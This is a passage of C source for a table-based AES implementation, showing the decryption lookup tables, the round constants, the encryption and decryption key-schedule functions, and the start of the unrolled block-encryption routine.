0x6bcb3babU, 0x45f11f9dU, 0x58abacfaU, 0x03934be3U, 0xfa552030U, 0x6df6ad76U, 0x769188ccU, 0x4c25f502U, 0xd7fc4fe5U, 0xcbd7c52aU, 0x44802635U, 0xa38fb562U, 0x5a49deb1U, 0x1b6725baU, 0x0e9845eaU, 0xc0e15dfeU, 0x7502c32fU, 0xf012814cU, 0x97a38d46U, 0xf9c66bd3U, 0x5fe7038fU, 0x9c951592U, 0x7aebbf6dU, 0x59da9552U, 0x832dd4beU, 0x21d35874U, 0x692949e0U, 0xc8448ec9U, 0x896a75c2U, 0x7978f48eU, 0x3e6b9958U, 0x71dd27b9U, 0x4fb6bee1U, 0xad17f088U, 0xac66c920U, 0x3ab47dceU, 0x4a1863dfU, 0x3182e51aU, 0x33609751U, 0x7f456253U, 0x77e0b164U, 0xae84bb6bU, 0xa01cfe81U, 0x2b94f908U, 0x68587048U, 0xfd198f45U, 0x6c8794deU, 0xf8b7527bU, 0xd323ab73U, 0x02e2724bU, 0x8f57e31fU, 0xab2a6655U, 0x2807b2ebU, 0xc2032fb5U, 0x7b9a86c5U, 0x08a5d337U, 0x87f23028U, 0xa5b223bfU, 0x6aba0203U, 0x825ced16U, 0x1c2b8acfU, 0xb492a779U, 0xf2f0f307U, 0xe2a14e69U, 0xf4cd65daU, 0xbed50605U, 0x621fd134U, 0xfe8ac4a6U, 0x539d342eU, 0x55a0a2f3U, 0xe132058aU, 0xeb75a4f6U, 0xec390b83U, 0xefaa4060U, 0x9f065e71U, 0x1051bd6eU, 0x8af93e21U, 0x063d96ddU, 0x05aedd3eU, 0xbd464de6U, 0x8db59154U, 0x5d0571c4U, 0xd46f0406U, 0x15ff6050U, 0xfb241998U, 0xe997d6bdU, 0x43cc8940U, 0x9e7767d9U, 0x42bdb0e8U, 0x8b880789U, 0x5b38e719U, 0xeedb79c8U, 0x0a47a17cU, 0x0fe97c42U, 0x1ec9f884U, 0x00000000U, 0x86830980U, 0xed48322bU, 0x70ac1e11U, 0x724e6c5aU, 0xfffbfd0eU, 0x38560f85U, 0xd51e3daeU, 0x3927362dU, 0xd9640a0fU, 0xa621685cU, 0x54d19b5bU, 0x2e3a2436U, 0x67b10c0aU, 0xe70f9357U, 0x96d2b4eeU, 0x919e1b9bU, 0xc54f80c0U, 0x20a261dcU, 0x4b695a77U, 0x1a161c12U, 0xba0ae293U, 0x2ae5c0a0U, 0xe0433c22U, 0x171d121bU, 0x0d0b0e09U, 0xc7adf28bU, 0xa8b92db6U, 0xa9c8141eU, 0x198557f1U, 0x074caf75U, 0xddbbee99U, 0x60fda37fU, 0x269ff701U, 0xf5bc5c72U, 0x3bc54466U, 0x7e345bfbU, 0x29768b43U, 0xc6dccb23U, 0xfc68b6edU, 0xf163b8e4U, 0xdccad731U, 0x85104263U, 0x22401397U, 0x112084c6U, 0x247d854aU, 0x3df8d2bbU, 0x3211aef9U, 0xa16dc729U, 0x2f4b1d9eU, 0x30f3dcb2U, 0x52ec0d86U, 0xe3d077c1U, 0x166c2bb3U, 0xb999a970U, 0x48fa1194U, 0x642247e9U, 0x8cc4a8fcU, 0x3f1aa0f0U, 0x2cd8567dU, 0x90ef2233U, 0x4ec78749U, 0xd1c1d938U, 0xa2fe8ccaU, 0x0b3698d4U, 0x81cfa6f5U, 0xde28a57aU, 0x8e26dab7U, 0xbfa43fadU, 0x9de42c3aU, 0x920d5078U, 0xcc9b6a5fU, 0x4662547eU, 0x13c2f68dU, 0xb8e890d8U, 0xf75e2e39U, 0xaff582c3U, 0x80be9f5dU, 0x937c69d0U, 0x2da96fd5U, 0x12b3cf25U, 0x993bc8acU, 0x7da71018U, 0x636ee89cU, 0xbb7bdb3bU, 0x7809cd26U, 0x18f46e59U, 0xb701ec9aU, 0x9aa8834fU, 0x6e65e695U, 0xe67eaaffU, 0xcf0821bcU, 0xe8e6ef15U, 0x9bd9bae7U, 0x36ce4a6fU, 0x09d4ea9fU, 0x7cd629b0U, 0xb2af31a4U, 0x23312a3fU, 0x9430c6a5U, 0x66c035a2U, 0xbc37744eU, 0xcaa6fc82U, 0xd0b0e090U, 0xd81533a7U, 0x984af104U, 0xdaf741ecU, 0x500e7fcdU, 0xf62f1791U, 0xd68d764dU, 0xb04d43efU, 0x4d54ccaaU, 0x04dfe496U, 0xb5e39ed1U, 0x881b4c6aU, 0x1fb8c12cU, 0x517f4665U, 0xea049d5eU, 0x355d018cU, 0x7473fa87U, 0x412efb0bU, 0x1d5ab367U, 0xd25292dbU, 0x5633e910U, 0x47136dd6U, 0x618c9ad7U, 0x0c7a37a1U, 0x148e59f8U, 0x3c89eb13U, 0x27eecea9U, 0xc935b761U, 0xe5ede11cU, 0xb13c7a47U, 0xdf599cd2U, 0x733f55f2U, 0xce791814U, 0x37bf73c7U, 0xcdea53f7U, 0xaa5b5ffdU, 0x6f14df3dU, 0xdb867844U, 0xf381caafU, 0xc43eb968U, 0x342c3824U, 0x405fc2a3U, 0xc372161dU, 0x250cbce2U, 0x498b283cU, 0x9541ff0dU, 0x017139a8U, 0xb3de080cU, 0xe49cd8b4U, 0xc1906456U, 0x84617bcbU, 0xb670d532U, 0x5c74486cU, 0x5742d0b8U, }; const uint32_t AES_Td3[256] = { 0xf4a75051U, 0x4165537eU, 0x17a4c31aU, 0x275e963aU, 0xab6bcb3bU, 0x9d45f11fU, 0xfa58abacU, 0xe303934bU, 0x30fa5520U, 0x766df6adU, 0xcc769188U, 0x024c25f5U, 0xe5d7fc4fU, 0x2acbd7c5U, 0x35448026U, 0x62a38fb5U, 0xb15a49deU, 0xba1b6725U, 0xea0e9845U, 0xfec0e15dU, 0x2f7502c3U, 0x4cf01281U, 0x4697a38dU, 0xd3f9c66bU, 0x8f5fe703U, 0x929c9515U, 0x6d7aebbfU, 0x5259da95U, 0xbe832dd4U, 0x7421d358U, 0xe0692949U, 0xc9c8448eU, 0xc2896a75U, 0x8e7978f4U, 0x583e6b99U, 0xb971dd27U, 0xe14fb6beU, 0x88ad17f0U, 0x20ac66c9U, 0xce3ab47dU, 0xdf4a1863U, 0x1a3182e5U, 0x51336097U, 0x537f4562U, 0x6477e0b1U, 0x6bae84bbU, 0x81a01cfeU, 0x082b94f9U, 0x48685870U, 0x45fd198fU, 0xde6c8794U, 0x7bf8b752U, 0x73d323abU, 0x4b02e272U, 0x1f8f57e3U, 0x55ab2a66U, 0xeb2807b2U, 0xb5c2032fU, 0xc57b9a86U, 0x3708a5d3U, 0x2887f230U, 0xbfa5b223U, 0x036aba02U, 0x16825cedU, 0xcf1c2b8aU, 0x79b492a7U, 0x07f2f0f3U, 0x69e2a14eU, 0xdaf4cd65U, 0x05bed506U, 0x34621fd1U, 0xa6fe8ac4U, 0x2e539d34U, 0xf355a0a2U, 0x8ae13205U, 0xf6eb75a4U, 0x83ec390bU, 0x60efaa40U, 0x719f065eU, 0x6e1051bdU, 0x218af93eU, 0xdd063d96U, 0x3e05aeddU, 0xe6bd464dU, 0x548db591U, 0xc45d0571U, 0x06d46f04U, 0x5015ff60U, 0x98fb2419U, 0xbde997d6U, 0x4043cc89U, 0xd99e7767U, 0xe842bdb0U, 0x898b8807U, 0x195b38e7U, 0xc8eedb79U, 0x7c0a47a1U, 0x420fe97cU, 0x841ec9f8U, 0x00000000U, 0x80868309U, 0x2bed4832U, 0x1170ac1eU, 0x5a724e6cU, 0x0efffbfdU, 0x8538560fU, 0xaed51e3dU, 0x2d392736U, 0x0fd9640aU, 0x5ca62168U, 0x5b54d19bU, 0x362e3a24U, 0x0a67b10cU, 0x57e70f93U, 0xee96d2b4U, 0x9b919e1bU, 0xc0c54f80U, 0xdc20a261U, 0x774b695aU, 0x121a161cU, 0x93ba0ae2U, 0xa02ae5c0U, 0x22e0433cU, 0x1b171d12U, 0x090d0b0eU, 0x8bc7adf2U, 0xb6a8b92dU, 0x1ea9c814U, 0xf1198557U, 0x75074cafU, 0x99ddbbeeU, 0x7f60fda3U, 0x01269ff7U, 0x72f5bc5cU, 0x663bc544U, 0xfb7e345bU, 0x4329768bU, 0x23c6dccbU, 0xedfc68b6U, 0xe4f163b8U, 0x31dccad7U, 0x63851042U, 0x97224013U, 0xc6112084U, 0x4a247d85U, 0xbb3df8d2U, 0xf93211aeU, 0x29a16dc7U, 0x9e2f4b1dU, 0xb230f3dcU, 0x8652ec0dU, 0xc1e3d077U, 0xb3166c2bU, 0x70b999a9U, 0x9448fa11U, 0xe9642247U, 0xfc8cc4a8U, 0xf03f1aa0U, 0x7d2cd856U, 0x3390ef22U, 0x494ec787U, 0x38d1c1d9U, 0xcaa2fe8cU, 0xd40b3698U, 0xf581cfa6U, 0x7ade28a5U, 0xb78e26daU, 0xadbfa43fU, 0x3a9de42cU, 0x78920d50U, 0x5fcc9b6aU, 0x7e466254U, 0x8d13c2f6U, 0xd8b8e890U, 0x39f75e2eU, 0xc3aff582U, 0x5d80be9fU, 0xd0937c69U, 0xd52da96fU, 0x2512b3cfU, 0xac993bc8U, 0x187da710U, 0x9c636ee8U, 0x3bbb7bdbU, 0x267809cdU, 0x5918f46eU, 0x9ab701ecU, 0x4f9aa883U, 0x956e65e6U, 0xffe67eaaU, 0xbccf0821U, 0x15e8e6efU, 0xe79bd9baU, 0x6f36ce4aU, 0x9f09d4eaU, 0xb07cd629U, 0xa4b2af31U, 0x3f23312aU, 0xa59430c6U, 0xa266c035U, 0x4ebc3774U, 0x82caa6fcU, 0x90d0b0e0U, 0xa7d81533U, 0x04984af1U, 0xecdaf741U, 0xcd500e7fU, 0x91f62f17U, 0x4dd68d76U, 0xefb04d43U, 0xaa4d54ccU, 0x9604dfe4U, 0xd1b5e39eU, 0x6a881b4cU, 0x2c1fb8c1U, 0x65517f46U, 0x5eea049dU, 0x8c355d01U, 0x877473faU, 0x0b412efbU, 0x671d5ab3U, 0xdbd25292U, 0x105633e9U, 0xd647136dU, 0xd7618c9aU, 0xa10c7a37U, 0xf8148e59U, 0x133c89ebU, 0xa927eeceU, 0x61c935b7U, 0x1ce5ede1U, 0x47b13c7aU, 0xd2df599cU, 0xf2733f55U, 0x14ce7918U, 0xc737bf73U, 0xf7cdea53U, 0xfdaa5b5fU, 0x3d6f14dfU, 0x44db8678U, 0xaff381caU, 0x68c43eb9U, 0x24342c38U, 0xa3405fc2U, 0x1dc37216U, 0xe2250cbcU, 0x3c498b28U, 0x0d9541ffU, 0xa8017139U, 0x0cb3de08U, 0xb4e49cd8U, 0x56c19064U, 0xcb84617bU, 0x32b670d5U, 0x6c5c7448U, 0xb85742d0U, }; const uint32_t AES_Td4[256] = { 0x52525252U, 0x09090909U, 0x6a6a6a6aU, 0xd5d5d5d5U, 0x30303030U, 0x36363636U, 0xa5a5a5a5U, 0x38383838U, 0xbfbfbfbfU, 0x40404040U, 0xa3a3a3a3U, 0x9e9e9e9eU, 0x81818181U, 0xf3f3f3f3U, 0xd7d7d7d7U, 0xfbfbfbfbU, 0x7c7c7c7cU, 0xe3e3e3e3U, 0x39393939U, 0x82828282U, 0x9b9b9b9bU, 0x2f2f2f2fU, 0xffffffffU, 0x87878787U, 0x34343434U, 0x8e8e8e8eU, 0x43434343U, 0x44444444U, 0xc4c4c4c4U, 0xdedededeU, 0xe9e9e9e9U, 0xcbcbcbcbU, 0x54545454U, 0x7b7b7b7bU, 0x94949494U, 0x32323232U, 0xa6a6a6a6U, 0xc2c2c2c2U, 0x23232323U, 0x3d3d3d3dU, 0xeeeeeeeeU, 0x4c4c4c4cU, 0x95959595U, 0x0b0b0b0bU, 0x42424242U, 0xfafafafaU, 0xc3c3c3c3U, 0x4e4e4e4eU, 0x08080808U, 0x2e2e2e2eU, 0xa1a1a1a1U, 0x66666666U, 0x28282828U, 0xd9d9d9d9U, 0x24242424U, 0xb2b2b2b2U, 0x76767676U, 0x5b5b5b5bU, 0xa2a2a2a2U, 0x49494949U, 0x6d6d6d6dU, 0x8b8b8b8bU, 0xd1d1d1d1U, 0x25252525U, 0x72727272U, 0xf8f8f8f8U, 0xf6f6f6f6U, 0x64646464U, 0x86868686U, 0x68686868U, 0x98989898U, 0x16161616U, 0xd4d4d4d4U, 0xa4a4a4a4U, 0x5c5c5c5cU, 0xccccccccU, 0x5d5d5d5dU, 0x65656565U, 0xb6b6b6b6U, 0x92929292U, 0x6c6c6c6cU, 0x70707070U, 0x48484848U, 0x50505050U, 0xfdfdfdfdU, 0xededededU, 0xb9b9b9b9U, 0xdadadadaU, 0x5e5e5e5eU, 0x15151515U, 0x46464646U, 0x57575757U, 0xa7a7a7a7U, 0x8d8d8d8dU, 0x9d9d9d9dU, 0x84848484U, 0x90909090U, 0xd8d8d8d8U, 0xababababU, 0x00000000U, 0x8c8c8c8cU, 0xbcbcbcbcU, 0xd3d3d3d3U, 0x0a0a0a0aU, 0xf7f7f7f7U, 0xe4e4e4e4U, 0x58585858U, 0x05050505U, 0xb8b8b8b8U, 0xb3b3b3b3U, 0x45454545U, 0x06060606U, 0xd0d0d0d0U, 0x2c2c2c2cU, 0x1e1e1e1eU, 0x8f8f8f8fU, 0xcacacacaU, 0x3f3f3f3fU, 0x0f0f0f0fU, 0x02020202U, 0xc1c1c1c1U, 0xafafafafU, 0xbdbdbdbdU, 0x03030303U, 0x01010101U, 0x13131313U, 0x8a8a8a8aU, 0x6b6b6b6bU, 0x3a3a3a3aU, 0x91919191U, 0x11111111U, 0x41414141U, 0x4f4f4f4fU, 0x67676767U, 0xdcdcdcdcU, 0xeaeaeaeaU, 0x97979797U, 0xf2f2f2f2U, 0xcfcfcfcfU, 0xcecececeU, 0xf0f0f0f0U, 0xb4b4b4b4U, 0xe6e6e6e6U, 0x73737373U, 0x96969696U, 0xacacacacU, 0x74747474U, 0x22222222U, 0xe7e7e7e7U, 0xadadadadU, 0x35353535U, 0x85858585U, 0xe2e2e2e2U, 0xf9f9f9f9U, 0x37373737U, 0xe8e8e8e8U, 0x1c1c1c1cU, 0x75757575U, 0xdfdfdfdfU, 0x6e6e6e6eU, 0x47474747U, 0xf1f1f1f1U, 0x1a1a1a1aU, 0x71717171U, 0x1d1d1d1dU, 0x29292929U, 0xc5c5c5c5U, 0x89898989U, 0x6f6f6f6fU, 0xb7b7b7b7U, 0x62626262U, 0x0e0e0e0eU, 0xaaaaaaaaU, 0x18181818U, 0xbebebebeU, 0x1b1b1b1bU, 0xfcfcfcfcU, 0x56565656U, 0x3e3e3e3eU, 0x4b4b4b4bU, 0xc6c6c6c6U, 0xd2d2d2d2U, 0x79797979U, 0x20202020U, 0x9a9a9a9aU, 0xdbdbdbdbU, 0xc0c0c0c0U, 0xfefefefeU, 0x78787878U, 0xcdcdcdcdU, 0x5a5a5a5aU, 0xf4f4f4f4U, 0x1f1f1f1fU, 0xddddddddU, 0xa8a8a8a8U, 0x33333333U, 0x88888888U, 0x07070707U, 0xc7c7c7c7U, 0x31313131U, 0xb1b1b1b1U, 0x12121212U, 0x10101010U, 0x59595959U, 0x27272727U, 0x80808080U, 0xececececU, 0x5f5f5f5fU, 0x60606060U, 0x51515151U, 0x7f7f7f7fU, 0xa9a9a9a9U, 0x19191919U, 0xb5b5b5b5U, 0x4a4a4a4aU, 0x0d0d0d0dU, 0x2d2d2d2dU, 0xe5e5e5e5U, 0x7a7a7a7aU, 0x9f9f9f9fU, 0x93939393U, 0xc9c9c9c9U, 0x9c9c9c9cU, 0xefefefefU, 0xa0a0a0a0U, 0xe0e0e0e0U, 0x3b3b3b3bU, 0x4d4d4d4dU, 0xaeaeaeaeU, 0x2a2a2a2aU, 0xf5f5f5f5U, 0xb0b0b0b0U, 0xc8c8c8c8U, 0xebebebebU, 0xbbbbbbbbU, 0x3c3c3c3cU, 0x83838383U, 0x53535353U, 0x99999999U, 0x61616161U, 0x17171717U, 0x2b2b2b2bU, 0x04040404U, 0x7e7e7e7eU, 0xbabababaU, 0x77777777U, 0xd6d6d6d6U, 0x26262626U, 0xe1e1e1e1U, 0x69696969U, 0x14141414U, 0x63636363U, 0x55555555U, 0x21212121U, 0x0c0c0c0cU, 0x7d7d7d7dU, }; static const u32 rcon[] = { 0x01000000, 0x02000000, 0x04000000, 0x08000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x1B000000, 0x36000000, /* for 128-bit blocks, Rijndael never uses more than 10 rcon values */ }; /** * Expand the cipher key into the encryption key schedule. */ int AES_set_encrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key) { u32 *rk; int i = 0; u32 temp; if (!userKey || !key) return -1; if (bits != 128 && bits != 192 && bits != 256) return -2; rk = key->rd_key; if (bits==128) key->rounds = 10; else if (bits==192) key->rounds = 12; else key->rounds = 14; rk[0] = GETU32(userKey ); rk[1] = GETU32(userKey + 4); rk[2] = GETU32(userKey + 8); rk[3] = GETU32(userKey + 12); if (bits == 128) { while (1) { temp = rk[3]; rk[4] = rk[0] ^ (AES_Te4[(temp >> 16) & 0xff] & 0xff000000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp ) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp >> 24) ] & 0x000000ff) ^ rcon[i]; rk[5] = rk[1] ^ rk[4]; rk[6] = rk[2] ^ rk[5]; rk[7] = rk[3] ^ rk[6]; if (++i == 10) { return 0; } rk += 4; } } rk[4] = GETU32(userKey + 16); rk[5] = GETU32(userKey + 20); if (bits == 192) { while (1) { temp = rk[ 5]; rk[ 6] = rk[ 0] ^ (AES_Te4[(temp >> 16) & 0xff] & 0xff000000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp ) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp >> 24) ] & 0x000000ff) ^ rcon[i]; rk[ 7] = rk[ 1] ^ rk[ 6]; rk[ 8] = rk[ 2] ^ rk[ 7]; rk[ 9] = rk[ 3] ^ rk[ 8]; if (++i == 8) { return 0; } rk[10] = rk[ 4] ^ rk[ 9]; rk[11] = rk[ 5] ^ rk[10]; rk += 6; } } rk[6] = GETU32(userKey + 24); rk[7] = GETU32(userKey + 28); if (bits == 256) { while (1) { temp = rk[ 7]; rk[ 8] = rk[ 0] ^ (AES_Te4[(temp >> 16) & 0xff] & 0xff000000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp ) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp >> 24) ] & 0x000000ff) ^ rcon[i]; rk[ 9] = rk[ 1] ^ rk[ 8]; rk[10] = rk[ 2] ^ rk[ 9]; rk[11] = rk[ 3] ^ rk[10]; if (++i == 7) { return 0; } temp = rk[11]; rk[12] = rk[ 4] ^ (AES_Te4[(temp >> 24) ] & 0xff000000) ^ (AES_Te4[(temp >> 16) & 0xff] & 0x00ff0000) ^ (AES_Te4[(temp >> 8) & 0xff] & 0x0000ff00) ^ (AES_Te4[(temp ) & 0xff] & 0x000000ff); rk[13] = rk[ 5] ^ rk[12]; rk[14] = rk[ 6] ^ rk[13]; rk[15] = rk[ 7] ^ rk[14]; rk += 8; } } abort(); } /** * Expand the cipher key into the decryption key schedule. */ int AES_set_decrypt_key(const unsigned char *userKey, const int bits, AES_KEY *key) { u32 *rk; int i, j, status; u32 temp; /* first, start with an encryption schedule */ status = AES_set_encrypt_key(userKey, bits, key); if (status < 0) return status; rk = key->rd_key; /* invert the order of the round keys: */ for (i = 0, j = 4*(key->rounds); i < j; i += 4, j -= 4) { temp = rk[i ]; rk[i ] = rk[j ]; rk[j ] = temp; temp = rk[i + 1]; rk[i + 1] = rk[j + 1]; rk[j + 1] = temp; temp = rk[i + 2]; rk[i + 2] = rk[j + 2]; rk[j + 2] = temp; temp = rk[i + 3]; rk[i + 3] = rk[j + 3]; rk[j + 3] = temp; } /* apply the inverse MixColumn transform to all round keys but the first and the last: */ for (i = 1; i < (key->rounds); i++) { rk += 4; rk[0] = AES_Td0[AES_Te4[(rk[0] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[0] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[0] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[0] ) & 0xff] & 0xff]; rk[1] = AES_Td0[AES_Te4[(rk[1] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[1] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[1] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[1] ) & 0xff] & 0xff]; rk[2] = AES_Td0[AES_Te4[(rk[2] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[2] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[2] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[2] ) & 0xff] & 0xff]; rk[3] = AES_Td0[AES_Te4[(rk[3] >> 24) ] & 0xff] ^ AES_Td1[AES_Te4[(rk[3] >> 16) & 0xff] & 0xff] ^ AES_Td2[AES_Te4[(rk[3] >> 8) & 0xff] & 0xff] ^ AES_Td3[AES_Te4[(rk[3] ) & 0xff] & 0xff]; } return 0; } #ifndef AES_ASM /* * Encrypt a single block * in and out can overlap */ void AES_encrypt(const unsigned char *in, unsigned char *out, const AES_KEY *key) { const u32 *rk; u32 s0, s1, s2, s3, t0, t1, t2, t3; #ifndef FULL_UNROLL int r; #endif /* ?FULL_UNROLL */ assert(in && out && key); rk = key->rd_key; /* * map byte array block to cipher state * and add initial round key: */ s0 = GETU32(in ) ^ rk[0]; s1 = GETU32(in + 4) ^ rk[1]; s2 = GETU32(in + 8) ^ rk[2]; s3 = GETU32(in + 12) ^ rk[3]; #ifdef FULL_UNROLL /* round 1: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[ 4]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[ 5]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[ 6]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[ 7]; /* round 2: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[ 8]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[ 9]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[10]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[11]; /* round 3: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[12]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[13]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[14]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[15]; /* round 4: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[16]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[17]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[18]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[19]; /* round 5: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[20]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[21]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[22]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[23]; /* round 6: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[24]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[25]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[26]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[27]; /* round 7: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[28]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[29]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[30]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[31]; /* round 8: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[32]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[33]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[34]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[35]; /* round 9: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ rk[36]; t1 = AES_Te0[s1 >> 24] ^ AES_Te1[(s2 >> 16) & 0xff] ^ AES_Te2[(s3 >> 8) & 0xff] ^ AES_Te3[s0 & 0xff] ^ rk[37]; t2 = AES_Te0[s2 >> 24] ^ AES_Te1[(s3 >> 16) & 0xff] ^ AES_Te2[(s0 >> 8) & 0xff] ^ AES_Te3[s1 & 0xff] ^ rk[38]; t3 = AES_Te0[s3 >> 24] ^ AES_Te1[(s0 >> 16) & 0xff] ^ AES_Te2[(s1 >> 8) & 0xff] ^ AES_Te3[s2 & 0xff] ^ rk[39]; if (key->rounds > 10) { /* round 10: */ s0 = AES_Te0[t0 >> 24] ^ AES_Te1[(t1 >> 16) & 0xff] ^ AES_Te2[(t2 >> 8) & 0xff] ^ AES_Te3[t3 & 0xff] ^ rk[40]; s1 = AES_Te0[t1 >> 24] ^ AES_Te1[(t2 >> 16) & 0xff] ^ AES_Te2[(t3 >> 8) & 0xff] ^ AES_Te3[t0 & 0xff] ^ rk[41]; s2 = AES_Te0[t2 >> 24] ^ AES_Te1[(t3 >> 16) & 0xff] ^ AES_Te2[(t0 >> 8) & 0xff] ^ AES_Te3[t1 & 0xff] ^ rk[42]; s3 = AES_Te0[t3 >> 24] ^ AES_Te1[(t0 >> 16) & 0xff] ^ AES_Te2[(t1 >> 8) & 0xff] ^ AES_Te3[t2 & 0xff] ^ rk[43]; /* round 11: */ t0 = AES_Te0[s0 >> 24] ^ AES_Te1[(s1 >> 16) & 0xff] ^ AES_Te2[(s2 >> 8) & 0xff] ^ AES_Te3[s3 & 0xff] ^ 